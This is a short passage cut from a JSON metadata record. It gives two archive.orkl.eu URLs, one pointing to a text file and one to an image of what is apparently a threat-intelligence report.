		"text": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.txt",
		"img": "https://archive.orkl.eu/d79bac860935bbf5d287f96651e5d0b5b59e4b7e.jpg"
	}
}